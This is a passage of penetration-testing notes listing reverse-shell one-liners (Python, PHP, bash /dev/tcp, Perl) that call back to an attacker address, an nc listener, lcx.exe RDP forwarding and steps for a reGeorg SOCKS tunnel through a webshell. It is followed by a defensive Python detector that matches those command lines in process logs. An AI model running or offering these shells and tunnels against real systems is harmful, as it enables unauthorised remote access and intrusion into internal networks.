Linux target machine:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.11.144",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
php -r '$sock=fsockopen("192.168.11.144",2222);exec("/bin/sh -i <&3 >&3 2>&3");'
bash -i >& /dev/tcp/192.168.11.144/2222 0>&1
perl -e 'use Socket;$i="192.168.11.144";$p=2222;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
vps:
nc -lvp 2222 (nc download link)
Windows target machine:
lcx.exe -slave x.x.x.x 2333 192.168.0.15 3389
vps:
lcx.exe -listen 2333 2334
SOCKS reverse tunnel:
reGeorg + Proxifier + SocksCap (optional)
First drop the matching reGeorg server script somewhere reachable over the web, for example the webshell directory, and open it in a browser to confirm it responds normally. Then run reGeorg's Python client locally, with -u pointing at the script you just uploaded and -p specifying a port; this opens a local SOCKS5 proxy. Finally, in SocksCap configure the proxy as 127.0.0.1 with the port you chose, and drag any tool you want to route into the internal network through the proxy into SocksCap.
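Each of the one-liners above leaves a distinctive process command line. As an added, defender-side example that is not part of the original notes, the following Python checker flags those patterns in process-creation events of the kind an auditd or EDR exporter emits; the hosts, timestamps and addresses in the sample events are constructed, and the rule names are arbitrary labels chosen here.

```python
import re
from typing import Dict, List, Tuple

# Each rule is a set of regexes that must ALL match one command line.
# Patterns follow the reverse-shell / port-forward one-liners above;
# the rule names are labels invented for this example.
RULES: Dict[str, List[str]] = {
    "bash_dev_tcp":     [r"/dev/tcp/\d{1,3}(\.\d{1,3}){3}/\d+"],
    "python_socket_sh": [r"\bpython", r"socket\.socket", r"os\.dup2", r"/bin/(ba)?sh"],
    "php_fsockopen_sh": [r"\bphp\b", r"fsockopen", r"\b(exec|system|popen|passthru)\b", r"/bin/(ba)?sh"],
    "perl_socket_sh":   [r"\bperl\b", r"\bSocket\b", r"open\(STD(IN|OUT|ERR)", r"/bin/(ba)?sh"],
    "nc_listener":      [r"\bnc(at)?\b", r"\s-l\w*"],
    "lcx_forward":      [r"\blcx(\.exe)?\b", r"\s-(slave|listen|tran)\b"],
}

def classify_cmdline(cmdline: str) -> List[str]:
    """Return the names of every rule whose patterns all match the command line."""
    return [name for name, pats in RULES.items()
            if all(re.search(p, cmdline, re.IGNORECASE) for p in pats)]

def scan_events(events: List[Tuple[str, str, str]]) -> List[dict]:
    """events: (timestamp, host, cmdline) tuples as a process-creation log might carry.
    Returns one finding per event that matched at least one rule, in input order."""
    findings = []
    for ts, host, cmd in events:
        hits = classify_cmdline(cmd)
        if hits:
            findings.append({"ts": ts, "host": host, "rules": hits, "cmd": cmd})
    return findings

# Constructed sample events (hosts and addresses are made up for this example).
SAMPLE_EVENTS = [
    ("2024-01-01T10:00:00Z", "web01", "bash -i >& /dev/tcp/203.0.113.5/2222 0>&1"),
    ("2024-01-01T10:00:05Z", "web01",
     "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
     "os.dup2(s.fileno(),0);subprocess.call([\"/bin/sh\",\"-i\"])'"),
    ("2024-01-01T10:01:00Z", "web01",
     "php -r '$sock=fsockopen(\"203.0.113.5\",2222);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"),
    ("2024-01-01T10:02:00Z", "win01", "lcx.exe -slave 203.0.113.5 2333 192.168.0.15 3389"),
    ("2024-01-01T10:03:00Z", "web01", "python manage.py runserver 0.0.0.0:8000"),  # benign
    ("2024-01-01T10:04:00Z", "web01", "php -r 'echo json_encode(array(1,2));'"),   # benign
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"{f['ts']} {f['host']} {','.join(f['rules'])}: {f['cmd'][:60]}")
```

Command-line matching is a first-pass signal only: the same shells can be launched from scripts or encoded arguments, so pair it with network telemetry for outbound connections from web-server and database processes.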
http://www.vuln.cn/6746
Earthwor
https://www.anquanke.com/post/id/85494
http://m.bobao.360.cn/learning/detail/3502.html